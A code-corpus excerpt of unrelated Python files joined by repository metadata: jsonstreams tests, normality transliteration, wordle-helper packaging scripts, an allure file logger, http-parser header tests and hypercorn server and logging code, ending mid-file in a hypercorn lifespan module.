assert f.read() == '{"foo": "bar", "ook": [1]}'
def test_inner_outer(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as s:
with s.subarray('ook') as p:
p.write(1)
s.write('foo', 'bar')
with open('foo', 'r') as f:
assert f.read() == '{"ook": [1], "foo": "bar"}'
def test_outer_inner_outer(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as s:
s.write("1", 'bar')
with s.subarray('ook') as p:
p.write(1)
s.write('foo', 'bar')
with open('foo', 'r') as f:
assert f.read() == \
'{"1": "bar", "ook": [1], "foo": "bar"}'
class TestNested(object):
"""Test various nested configurations."""
def test_inner(self):
with open('foo', 'w') as f:
s = jsonstreams.Object(f, 0, 0, _ENCODER)
p = s.subarray("2")
p.write(1)
p.close()
s.close()
with open('foo', 'r') as f:
assert f.read() == '{"2": [1]}'
def test_outer_inner(self):
with open('foo', 'w') as f:
s = jsonstreams.Object(f, 0, 0, _ENCODER)
s.write("1", 'foo')
p = s.subarray("2")
p.write(1)
p.close()
s.close()
with open('foo', 'r') as f:
assert f.read() == '{"1": "foo", "2": [1]}'
def test_inner_outer(self):
with open('foo', 'w') as f:
s = jsonstreams.Object(f, 0, 0, _ENCODER)
p = s.subarray("2")
p.write(1)
p.close()
s.write("1", 'foo')
s.close()
with open('foo', 'r') as f:
assert f.read() == '{"2": [1], "1": "foo"}'
def test_outer_inner_outer(self):
with open('foo', 'w') as f:
s = jsonstreams.Object(f, 0, 0, _ENCODER)
s.write('1', 'foo')
p = s.subarray('2')
p.write(1)
p.close()
s.write('3', 'foo')
s.close()
with open('foo', 'r') as f:
assert f.read() == '{"1": "foo", "2": [1], "3": "foo"}'
class TestClose(object):
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
def test_basic(self):
with open('foo', 'w') as f:
test = jsonstreams.Object(f, 0, 0, _ENCODER)
test.close()
with open('foo', 'r') as f:
assert f.read() == '{}'
def test_close(self):
with open('foo', 'w') as f:
test = jsonstreams.Object(f, 0, 0, _ENCODER)
test.close()
with pytest.raises(jsonstreams.StreamClosedError):
test.write('foo', 'bar')
def test_write(self):
with open('foo', 'w') as f:
test = jsonstreams.Object(f, 0, 0, _ENCODER)
test.close()
with pytest.raises(jsonstreams.StreamClosedError):
test.close()
def test_subarray(self):
with open('foo', 'w') as f:
test = jsonstreams.Object(f, 0, 0, _ENCODER)
test.close()
with pytest.raises(jsonstreams.StreamClosedError):
test.subarray('foo')
def test_subobject(self):
with open('foo', 'w') as f:
test = jsonstreams.Object(f, 0, 0, _ENCODER)
test.close()
with pytest.raises(jsonstreams.StreamClosedError):
test.subobject('foo')
class TestWriteToParent(object):
"""Tests for writing to the parent with a subobject open."""
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
def test_subobject(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as a:
with a.subobject('foo') as b:
with pytest.raises(jsonstreams.ModifyWrongStreamError):
a.write('foo', 'bar')
def test_subarray(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as a:
with a.subarray('foo') as b:
with pytest.raises(jsonstreams.ModifyWrongStreamError):
a.write('foo', 'bar')
class TestIterWrite(object):
"""Tests for the iterwrite object."""
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
def test_basic(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as a:
a.iterwrite(six.iteritems({'a': 1, '2': 2, 'foo': None}))
with open('foo', 'r') as f:
actual = json.load(f)
assert actual == {"a": 1, "2": 2, "foo": None}
def test_mixed(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as a:
a.iterwrite(six.iteritems({'a': 1, '2': 2, 'foo': None}))
a.write('bar', 3)
with open('foo', 'r') as f:
actual = json.load(f)
assert actual == {"a": 1, "2": 2, "foo": None, "bar": 3}
def test_pretty_multiple(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 4, 0, _ENCODER, pretty=True) as a:
a.iterwrite((str(i), i) for i in range(5))
with open('foo', 'r') as f:
actual = json.load(f)
assert actual == {str(i): i for i in range(5)}
def test_pretty_one(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 4, 0, _ENCODER, pretty=True) as a:
a.iterwrite((str(i), i) for i in range(1))
with open('foo', 'r') as f:
actual = json.load(f)
assert actual == {str(i): i for i in range(1)}
with open('foo', 'r') as f:
actual = f.read()
assert actual == textwrap.dedent("""\
{
"0": 0
}""")
def test_pretty_subobject(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 4, 0, _ENCODER, pretty=True) as a:
a.iterwrite((str(i), i) for i in range(5))
with a.subobject('foo') as b:
b.iterwrite((str(i), i) for i in range(2))
expected = {str(i): i for i in range(5)}
expected['foo'] = {str(i): i for i in range(2)}
with open('foo', 'r') as f:
actual = json.load(f)
assert actual == expected
def test_pretty_subarray(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 4, 0, _ENCODER, pretty=True) as a:
a.iterwrite((str(i), i) for i in range(5))
with a.subarray('foo') as b:
b.iterwrite(range(2))
expected = {str(i): i for i in range(5)}
expected['foo'] = list(range(2))
with open('foo', 'r') as f:
actual = json.load(f)
assert actual == expected
class TestArray(object):
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
def test_init(self):
with open('foo', 'w') as f:
jsonstreams.Array(f, 0, 0, _ENCODER)
with open('foo', 'r') as f:
assert f.read() == '['
def test_context_manager(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as _:
pass
with open('foo', 'r') as f:
assert f.read() == '[]'
class TestWrite(object):
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
class TestWithoutIndent(object):
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
def test_write_one(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as s:
s.write('foo')
with open('foo', 'r') as f:
assert f.read() == '["foo"]'
def test_write_two(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as s:
s.write('foo')
s.write('bar')
with open('foo', 'r') as f:
assert f.read() == '["foo", "bar"]'
def test_complex(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as s:
s.write({"1": 'bar'})
with open('foo', 'r') as f:
assert f.read() == '[{"1": "bar"}]'
class TestWithIndent(object):
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
def test_write_one(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 4, 0, _ENCODER) as s:
s.write('foo')
with open('foo', 'r') as f:
assert f.read() == textwrap.dedent("""\
[
"foo"
]""")
def test_write_two(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 4, 0, _ENCODER) as s:
s.write('foo')
s.write('bar')
with open('foo', 'r') as f:
assert f.read() == textwrap.dedent("""\
[
"foo",
"bar"
]""")
def test_complex(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 4, 0, _ENCODER) as s:
s.write({"1": 'bar'})
with open('foo', 'r') as f:
assert f.read() == textwrap.dedent("""\
[
{"1": "bar"}
]""")
@pytest.mark.parametrize("value,expected", [ # type: ignore
("foo", '["foo"]'),
(1, '[1]'),
(1.0, '[1.0]'),
(None, '[null]'),
({"foo": "bar"}, '[{"foo": "bar"}]'),
(["foo"], '[["foo"]]'),
])
def test_types(self, value, expected):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as s:
s.write(value)
with open('foo', 'r') as f:
assert f.read() == expected
def test_pretty(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 4, 0, json.JSONEncoder(indent=4),
pretty=True) as s:
s.write({'bar': {"b": 0}})
s.write({'fob': {"f": 0}})
with open('foo', 'r') as f:
actual = f.read()
assert actual == textwrap.dedent("""\
[
{
"bar": {
"b": 0
}
},
{
"fob": {
"f": 0
}
}
]""")
class TestSubobject(object):
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
def test_basic(self):
with open('foo', 'w') as f:
s = jsonstreams.Array(f, 0, 0, _ENCODER)
p = s.subobject()
p.write('foo', 'bar')
p.close()
s.close()
with open('foo', 'r') as f:
assert f.read() == '[{"foo": "bar"}]'
def test_context_manager(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as s:
with s.subobject() as p:
p.write('foo', 'bar')
with open('foo', 'r') as f:
assert f.read() == '[{"foo": "bar"}]'
def test_indent(self):
with open('foo', 'w') as f:
s = jsonstreams.Array(f, 4, 0, _ENCODER)
p = s.subobject()
p.write('foo', 'bar')
p.close()
s.close()
with open('foo', 'r') as f:
assert f.read() == textwrap.dedent("""\
[
{
"foo": "bar"
}
]""")
def test_context_manager_indent(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 4, 0, _ENCODER) as s:
with s.subobject() as p:
p.write('foo', 'bar')
with open('foo', 'r') as f:
assert f.read() == textwrap.dedent("""\
[
{
"foo": "bar"
}
]""")
class TestNestedContextManager(object):
"""Test various nested configurations with context managers."""
def test_inner(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as s:
with s.subobject() as p:
p.write('foo', 'bar')
p.write("1", 'bar')
with open('foo', 'r') as f:
assert f.read() == '[{"foo": "bar", "1": "bar"}]'
def test_outer_inner(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as s:
s.write('foo')
with s.subobject() as p:
p.write("1", 'bar')
with open('foo', 'r') as f:
assert f.read() == '["foo", {"1": "bar"}]'
def test_inner_outer(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as s:
with s.subobject() as p:
p.write("1", 'bar')
s.write('foo')
with open('foo', 'r') as f:
assert f.read() == '[{"1": "bar"}, "foo"]'
def test_outer_inner_outer(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as s:
s.write(1)
with s.subobject() as p:
p.write("1", 'bar')
s.write(2)
with open('foo', 'r') as f:
assert f.read() == '[1, {"1": "bar"}, 2]'
class TestNested(object):
"""Test various nested configurations."""
def test_inner(self):
with open('foo', 'w') as f:
s = jsonstreams.Array(f, 0, 0, _ENCODER)
p = s.subobject()
p.write('foo', 'bar')
p.write('1', 'bar')
p.close()
s.close()
with open('foo', 'r') as f:
assert f.read() == '[{"foo": "bar", "1": "bar"}]'
def test_outer_inner(self):
with open('foo', 'w') as f:
s = jsonstreams.Array(f, 0, 0, _ENCODER)
s.write('foo')
p = s.subobject()
p.write('1', 'bar')
p.close()
s.close()
with open('foo', 'r') as f:
assert f.read() == '["foo", {"1": "bar"}]'
def test_inner_outer(self):
with open('foo', 'w') as f:
s = jsonstreams.Array(f, 0, 0, _ENCODER)
p = s.subobject()
p.write('1', 'bar')
p.close()
s.write('foo')
s.close()
with open('foo', 'r') as f:
assert f.read() == '[{"1": "bar"}, "foo"]'
def test_outer_inner_outer(self):
with open('foo', 'w') as f:
s = jsonstreams.Array(f, 0, 0, _ENCODER)
s.write(1)
p = s.subobject()
p.write('1', 'bar')
p.close()
s.write(2)
s.close()
with open('foo', 'r') as f:
assert f.read() == '[1, {"1": "bar"}, 2]'
class TestSubarray(object):
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
def test_basic(self):
with open('foo', 'w') as f:
s = jsonstreams.Array(f, 0, 0, _ENCODER)
p = s.subarray()
p.write('foo')
p.close()
s.close()
with open('foo', 'r') as f:
assert f.read() == '[["foo"]]'
def test_context_manager(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as s:
with s.subarray() as p:
p.write('foo')
with open('foo', 'r') as f:
assert f.read() == '[["foo"]]'
def test_indent(self):
with open('foo', 'w') as f:
s = jsonstreams.Array(f, 4, 0, _ENCODER)
p = s.subarray()
p.write('foo')
p.close()
s.close()
with open('foo', 'r') as f:
assert f.read() == textwrap.dedent("""\
[
[
"foo"
]
]""")
def test_context_manager_indent(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 4, 0, _ENCODER) as s:
with s.subarray() as p:
p.write('foo')
with open('foo', 'r') as f:
assert f.read() == textwrap.dedent("""\
[
[
"foo"
]
]""")
class TestNestedContextManager(object):
"""Test various nested configurations with context managers."""
def test_inner(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as s:
with s.subarray() as p:
p.write('foo')
p.write('bar')
with open('foo', 'r') as f:
assert f.read() == '[["foo", "bar"]]'
def test_outer_inner(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as s:
s.write('foo')
with s.subarray() as p:
p.write('bar')
with open('foo', 'r') as f:
assert f.read() == '["foo", ["bar"]]'
def test_inner_outer(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as s:
with s.subarray() as p:
p.write('bar')
s.write('foo')
with open('foo', 'r') as f:
assert f.read() == '[["bar"], "foo"]'
def test_outer_inner_outer(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as s:
s.write(1)
with s.subarray() as p:
p.write('bar')
s.write(2)
with open('foo', 'r') as f:
assert f.read() == '[1, ["bar"], 2]'
class TestNested(object):
"""Test various nested configurations."""
def test_inner(self):
with open('foo', 'w') as f:
s = jsonstreams.Array(f, 0, 0, _ENCODER)
p = s.subarray()
p.write('foo')
p.write('bar')
p.close()
s.close()
with open('foo', 'r') as f:
assert f.read() == '[["foo", "bar"]]'
def test_outer_inner(self):
with open('foo', 'w') as f:
s = jsonstreams.Array(f, 0, 0, _ENCODER)
s.write('foo')
p = s.subarray()
p.write('bar')
p.close()
s.close()
with open('foo', 'r') as f:
assert f.read() == '["foo", ["bar"]]'
def test_inner_outer(self):
with open('foo', 'w') as f:
s = jsonstreams.Array(f, 0, 0, _ENCODER)
p = s.subarray()
p.write('foo')
p.close()
s.write('bar')
s.close()
with open('foo', 'r') as f:
assert f.read() == '[["foo"], "bar"]'
def test_outer_inner_outer(self):
with open('foo', 'w') as f:
s = jsonstreams.Array(f, 0, 0, _ENCODER)
s.write(1)
p = s.subarray()
p.write(1)
p.close()
s.write(2)
s.close()
with open('foo', 'r') as f:
assert f.read() == '[1, [1], 2]'
class TestClose(object):
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
def test_basic(self):
with open('foo', 'w') as f:
test = jsonstreams.Array(f, 0, 0, _ENCODER)
test.close()
with open('foo', 'r') as f:
assert f.read() == '[]'
def test_close(self):
with open('foo', 'w') as f:
test = jsonstreams.Array(f, 0, 0, _ENCODER)
test.close()
with pytest.raises(jsonstreams.StreamClosedError):
test.write('foo')
def test_write(self):
with open('foo', 'w') as f:
test = jsonstreams.Array(f, 0, 0, _ENCODER)
test.close()
with pytest.raises(jsonstreams.StreamClosedError):
test.close()
def test_subarray(self):
with open('foo', 'w') as f:
test = jsonstreams.Array(f, 0, 0, _ENCODER)
test.close()
with pytest.raises(jsonstreams.StreamClosedError):
test.subarray()
def test_subobject(self):
with open('foo', 'w') as f:
test = jsonstreams.Array(f, 0, 0, _ENCODER)
test.close()
with pytest.raises(jsonstreams.StreamClosedError):
test.subobject()
class TestWriteToParent(object):
"""Tests for writing to the parent with a subobject open."""
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
def test_subobject(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as a:
with a.subobject() as b:
with pytest.raises(jsonstreams.ModifyWrongStreamError):
a.write('foo')
def test_subarray(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as a:
with a.subarray() as b:
with pytest.raises(jsonstreams.ModifyWrongStreamError):
a.write('foo')
class TestIterWrite(object):
"""Tests for the iterwrite object."""
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
def test_basic(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as a:
a.iterwrite(range(5))
with open('foo', 'r') as f:
actual = json.load(f)
assert actual == list(range(5))
def test_mixed(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 0, 0, _ENCODER) as a:
a.iterwrite(range(5))
a.write('a')
with open('foo', 'r') as f:
actual = json.load(f)
assert actual == list(range(5)) + ['a']
def test_pretty_multiple(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 4, 0, _ENCODER, pretty=True) as a:
a.iterwrite(range(5))
with open('foo', 'r') as f:
actual = json.load(f)
assert actual == list(range(5))
with open('foo', 'r') as f:
actual = f.read()
assert actual == textwrap.dedent("""\
[
0,
1,
2,
3,
4
]""")
def test_pretty_one(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 4, 0, _ENCODER, pretty=True) as a:
a.iterwrite(range(1))
with open('foo', 'r') as f:
actual = json.load(f)
assert actual == list(range(1))
with open('foo', 'r') as f:
actual = f.read()
assert actual == textwrap.dedent("""\
[
0
]""")
def test_pretty_subobject(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 4, 0, _ENCODER, pretty=True) as a:
a.iterwrite(range(5))
with a.subobject() as b:
b.iterwrite((str(i), i) for i in range(2))
expected = list(range(5))
expected.append({str(i): i for i in range(2)})
with open('foo', 'r') as f:
actual = json.load(f)
assert actual == expected
def test_pretty_subarray(self):
with open('foo', 'w') as f:
with jsonstreams.Array(f, 4, 0, _ENCODER, pretty=True) as a:
a.iterwrite(range(5))
with a.subarray() as b:
b.iterwrite(range(2))
expected = list(range(5))
expected.append(list(range(2)))
with open('foo', 'r') as f:
actual = json.load(f)
assert actual == expected
``` |
{
"source": "JonoYang/normality",
"score": 4
} |
#### File: normality/normality/transliteration.py
```python
import warnings
from typing import Optional
from normality.cleaning import compose_nfkc, is_text
# Transform to latin, separate accents, decompose, remove
# symbols, compose, push to ASCII
ASCII_SCRIPT = 'Any-Latin; NFKD; [:Symbol:] Remove; [:Nonspacing Mark:] Remove; NFKC; Accents-Any; Latin-ASCII' # noqa
class ICUWarning(UnicodeWarning):
pass
def latinize_text(text: Optional[str], ascii=False) -> Optional[str]:
"""Transliterate the given text to the latin script.
This attempts to convert a given text to latin script using the
closest match of characters vis a vis the original script.
"""
if text is None or not is_text(text) or not len(text):
return text
if ascii:
if not hasattr(latinize_text, '_ascii'):
latinize_text._ascii = make_trans(ASCII_SCRIPT) # type: ignore
return latinize_text._ascii(text) # type: ignore
if not hasattr(latinize_text, '_tr'):
latinize_text._tr = make_trans('Any-Latin') # type: ignore
return latinize_text._tr(text) # type: ignore
def ascii_text(text: Optional[str]) -> Optional[str]:
"""Transliterate the given text and make sure it ends up as ASCII."""
text = latinize_text(text, ascii=True)
if text is None or not is_text(text):
return None
return text.encode('ascii', 'ignore').decode('ascii')
def make_trans(script):
try:
from icu import Transliterator # type: ignore
inst = Transliterator.createInstance(script)
return inst.transliterate
except ImportError:
from text_unidecode import unidecode # type: ignore
warnings.warn("Install 'pyicu' for better text transliteration.", ICUWarning, stacklevel=4) # noqa
def transliterate(text):
text = compose_nfkc(text)
return unidecode(text)
return transliterate
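# A small usage sketch (not part of normality itself); the sample strings and the
# results in the comments are illustrative only, since the exact output depends on
# whether pyicu or text_unidecode is installed.
if __name__ == "__main__":
    print(latinize_text("Ελληνικά"))  # roughly "Ellenika"
    print(ascii_text("Müller"))       # "Muller"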
``` |
{
"source": "JonoYang/wordle-helper",
"score": 2
} |
#### File: etc/scripts/gen_requirements.py
```python
import argparse
import pathlib
import utils_requirements
"""
Utilities to manage requirements files.
NOTE: this should use ONLY the standard library and not import anything else
because this is used for bootstrapping with no requirements installed.
"""
def gen_requirements():
description = """
    Create or replace the `--requirements-file` FILE requirements file with all
    the Python packages found installed in `--site-packages-dir`.
"""
parser = argparse.ArgumentParser(description=description)
parser.add_argument(
"-s",
"--site-packages-dir",
dest="site_packages_dir",
type=pathlib.Path,
required=True,
metavar="DIR",
help="Path to the 'site-packages' directory where wheels are installed such as lib/python3.6/site-packages",
)
parser.add_argument(
"-r",
"--requirements-file",
type=pathlib.Path,
metavar="FILE",
default="requirements.txt",
help="Path to the requirements file to update or create.",
)
args = parser.parse_args()
utils_requirements.lock_requirements(
site_packages_dir=args.site_packages_dir,
requirements_file=args.requirements_file,
)
if __name__ == "__main__":
gen_requirements()
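# Example invocation (a sketch; the paths below are placeholders):
#   python gen_requirements.py \
#       --site-packages-dir venv/lib/python3.9/site-packages \
#       --requirements-file requirements.txt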
```
#### File: etc/scripts/test_utils_pypi_supported_tags.py
```python
import pytest
from utils_pypi_supported_tags import validate_platforms_for_pypi
"""
Wheel platform checking tests
Copied and modified on 2020-12-24 from
https://github.com/pypa/warehouse/blob/37a83dd342d9e3b3ab4f6bde47ca30e6883e2c4d/tests/unit/forklift/test_legacy.py
"""
def validate_wheel_filename_for_pypi(filename):
"""
Validate if the filename is a PyPI/warehouse-uploadable wheel file name
with supported platform tags. Return a list of unsupported platform tags or
an empty list if all tags are supported.
"""
from utils_thirdparty import Wheel
wheel = Wheel.from_filename(filename)
return validate_platforms_for_pypi(wheel.platforms)
@pytest.mark.parametrize(
"plat",
[
"any",
"win32",
"win_amd64",
"win_ia64",
"manylinux1_i686",
"manylinux1_x86_64",
"manylinux2010_i686",
"manylinux2010_x86_64",
"manylinux2014_i686",
"manylinux2014_x86_64",
"manylinux2014_aarch64",
"manylinux2014_armv7l",
"manylinux2014_ppc64",
"manylinux2014_ppc64le",
"manylinux2014_s390x",
"manylinux_2_5_i686",
"manylinux_2_12_x86_64",
"manylinux_2_17_aarch64",
"manylinux_2_17_armv7l",
"manylinux_2_17_ppc64",
"manylinux_2_17_ppc64le",
"manylinux_3_0_s390x",
"macosx_10_6_intel",
"macosx_10_13_x86_64",
"macosx_11_0_x86_64",
"macosx_10_15_arm64",
"macosx_11_10_universal2",
# A real tag used by e.g. some numpy wheels
(
"macosx_10_6_intel.macosx_10_9_intel.macosx_10_9_x86_64."
"macosx_10_10_intel.macosx_10_10_x86_64"
),
],
)
def test_is_valid_pypi_wheel_return_true_for_supported_wheel(plat):
filename = f"foo-1.2.3-cp34-none-{plat}.whl"
assert not validate_wheel_filename_for_pypi(filename)
@pytest.mark.parametrize(
"plat",
[
"linux_x86_64",
"linux_x86_64.win32",
"macosx_9_2_x86_64",
"macosx_12_2_arm64",
"macosx_10_15_amd64",
],
)
def test_is_valid_pypi_wheel_raise_exception_for_unsupported_wheel(plat):
filename = f"foo-1.2.3-cp34-none-{plat}.whl"
invalid = validate_wheel_filename_for_pypi(filename)
assert invalid
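# Illustrative sketch of the helper outside of pytest; the wheel file names are made
# up, and the function returns the list of unsupported platform tags (empty when the
# wheel is acceptable for PyPI):
#   validate_wheel_filename_for_pypi("foo-1.2.3-cp34-none-win_amd64.whl")    # -> []
#   validate_wheel_filename_for_pypi("foo-1.2.3-cp34-none-linux_x86_64.whl") # -> something like ["linux_x86_64"]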
``` |
{
"source": "jonozzz/allure-python",
"score": 2
} |
#### File: allure-python-commons/src/logger.py
```python
import io
import os
import sys
import json
import uuid
import shutil
from six import text_type
from attr import asdict
from allure_commons import hookimpl
INDENT = 4
class AllureFileLogger(object):
def __init__(self, report_dir, clean=False):
self._report_dir = report_dir
if not os.path.exists(report_dir):
os.makedirs(report_dir)
elif clean:
for f in os.listdir(report_dir):
f = os.path.join(report_dir, f)
if os.path.isfile(f):
os.unlink(f)
def _report_item(self, item):
indent = INDENT if os.environ.get("ALLURE_INDENT_OUTPUT") else None
filename = item.file_pattern.format(prefix=uuid.uuid4())
data = asdict(item, filter=lambda attr, value: not (type(value) != bool and not bool(value)))
with io.open(os.path.join(self._report_dir, filename), 'w', encoding='utf8') as json_file:
if sys.version_info.major < 3:
json_file.write(unicode(json.dumps(data, indent=indent, ensure_ascii=False, encoding='utf8')))
else:
json.dump(data, json_file, indent=indent, ensure_ascii=False)
@hookimpl
def report_result(self, result):
self._report_item(result)
@hookimpl
def report_container(self, container):
self._report_item(container)
@hookimpl
def report_attached_file(self, source, file_name):
destination = os.path.join(self._report_dir, file_name)
shutil.copy2(source, destination)
@hookimpl
def report_attached_data(self, body, file_name):
destination = os.path.join(self._report_dir, file_name)
with open(destination, 'wb') as attached_file:
if isinstance(body, text_type):
attached_file.write(body.encode('utf-8'))
else:
attached_file.write(body)
@hookimpl
def store_environment(self, env):
filename = 'environment.properties'
with io.open(os.path.join(self._report_dir, filename), 'w', encoding='utf8') as file:
file.writelines([u"{0}={1}\n".format(*x) for x in env.items()])
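# Minimal usage sketch, not how allure-pytest wires the plugin up in practice: it
# simply calls the hook methods defined above directly; the directory and file names
# are placeholders.
if __name__ == "__main__":
    logger = AllureFileLogger("allure-results", clean=True)
    logger.report_attached_data(b"hello", "attachment.txt")
    logger.store_environment({"stand": "local"})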
``` |
{
"source": "jonozzz/http-parser",
"score": 3
} |
#### File: http-parser/testing/test_headers.py
```python
import pytest
import io
from http_parser.http import HttpStream
from http_parser.pyparser import HttpParser as PyHttpParser
def test_continuation_header():
stream = io.BytesIO(b'GET /test HTTP/1.1\r\nX-Test: foo\r\n bar\r\n\r\n')
hdr = HttpStream(stream).headers()
assert hdr['X-Test'] == 'foo bar'
def test_repeated_header():
stream = io.BytesIO(b'GET /test HTTP/1.1\r\nX-Test: foo\r\nX-Test: bar\r\n\r\n')
hdr = HttpStream(stream).headers()
assert hdr['X-Test'] == 'foo, bar'
def test_repeated_continuation_header():
stream = io.BytesIO(b'GET /test HTTP/1.1\r\nX-Test: foo\r\n bar\r\nX-Test: baz\r\n qux\r\n\r\n')
hdr = HttpStream(stream).headers()
assert hdr['X-Test'] == 'foo bar, baz qux'
def test_continuation_header_py():
stream = io.BytesIO(b'GET /test HTTP/1.1\r\nX-Test: foo\r\n bar\r\n\r\n')
hdr = HttpStream(stream, parser_class=PyHttpParser).headers()
assert hdr['X-Test'] == 'foo bar'
def test_repeated_header_py():
stream = io.BytesIO(b'GET /test HTTP/1.1\r\nX-Test: foo\r\nX-Test: bar\r\n\r\n')
hdr = HttpStream(stream, parser_class=PyHttpParser).headers()
assert hdr['X-Test'] == 'foo, bar'
def test_repeated_continuation_header_py():
stream = io.BytesIO(b'GET /test HTTP/1.1\r\nX-Test: foo\r\n bar\r\nX-Test: baz\r\n qux\r\n\r\n')
hdr = HttpStream(stream, parser_class=PyHttpParser).headers()
assert hdr['X-Test'] == 'foo bar, baz qux'
``` |
{
"source": "jonozzz/hypercorn",
"score": 3
} |
#### File: compliance/h2spec/server.py
```python
import ssl
from hypercorn.config import Config
from hypercorn import run_single
class App:
def __init__(self, scope):
pass
async def __call__(self, receive, send):
while True:
event = await receive()
if event['type'] == 'http.disconnect':
break
elif event['type'] == 'http.request' and not event.get('more_body', False):
await self.send_data(send)
break
elif event['type'] == 'lifespan.startup':
await send({'type': 'lifespan.startup.complete'})
elif event['type'] == 'lifespan.shutdown':
await send({'type': 'lifespan.shutdown.complete'})
break
async def send_data(self, send):
await send({
'type': 'http.response.start',
'status': 200,
'headers': [(b'content-length', b'5')],
})
await send({
'type': 'http.response.body',
'body': b'Hello',
'more_body': False,
})
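# Rough sketch of how this app might be served for h2spec runs; the exact
# run_single() signature differs between hypercorn versions, so treat this as
# indicative only (the bind address and cert/key paths are placeholders):
#   config = Config()
#   config.bind = ["localhost:5000"]
#   config.certfile = "cert.pem"
#   config.keyfile = "key.pem"
#   run_single(App, config)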
```
#### File: hypercorn/hypercorn/logging.py
```python
import logging
import os
import sys
import time
from typing import Any, Optional, Union
class AccessLogger:
def __init__(self, log_format: str, target: Union[logging.Logger, str, None]) -> None:
self.logger: Optional[logging.Logger] = None
self.log_format = log_format
if isinstance(target, logging.Logger):
self.logger = target
elif target is not None:
self.logger = logging.getLogger("hypercorn.access")
self.logger.handlers = []
if target == "-":
self.logger.addHandler(logging.StreamHandler(sys.stdout))
else:
self.logger.addHandler(logging.FileHandler(target))
self.logger.setLevel(logging.INFO)
def access(self, request: dict, response: dict, request_time: float) -> None:
if self.logger is not None:
self.logger.info(self.log_format, AccessLogAtoms(request, response, request_time))
def __getattr__(self, name: str) -> Any:
if self.logger is None:
return lambda *_: None
else:
return getattr(self.logger, name)
class AccessLogAtoms(dict):
def __init__(self, request: dict, response: dict, request_time: float) -> None:
for name, value in request["headers"]:
self[f"{{{name.decode().lower()}}}i"] = value.decode()
for name, value in response["headers"]:
self[f"{{{name.decode().lower()}}}o"] = value.decode()
for name, value in os.environ.items():
self[f"{{{name.lower()}}}e"] = value
protocol = request.get("http_version", "ws")
client = request.get("client")
if client is None:
remote_addr = None
elif len(client) == 2:
remote_addr = f"{client[0]}:{client[1]}"
elif len(client) == 1:
remote_addr = client[0]
else: # make sure not to throw UnboundLocalError
remote_addr = f"<???{client}???>"
method = request.get("method", "GET")
self.update(
{
"h": remote_addr,
"l": "-",
"t": time.strftime("[%d/%b/%Y:%H:%M:%S %z]"),
"r": f"{method} {request['path']} {protocol}",
"s": response["status"],
"m": method,
"U": request["path"],
"q": request["query_string"].decode(),
"H": protocol,
"b": self["{Content-Length}o"],
"B": self["{Content-Length}o"],
"f": self["{Referer}i"],
"a": self["{User-Agent}i"],
"T": int(request_time),
"D": int(request_time * 1_000_000),
"L": f"{request_time:.6f}",
"p": f"<{os.getpid()}>",
}
)
def __getitem__(self, key: str) -> str:
try:
if key.startswith("{"):
return super().__getitem__(key.lower())
else:
return super().__getitem__(key)
except KeyError:
return "-"
```
#### File: hypercorn/trio/lifespan.py
```python
from typing import Type
import trio
from ..config import Config
from ..typing import ASGIFramework
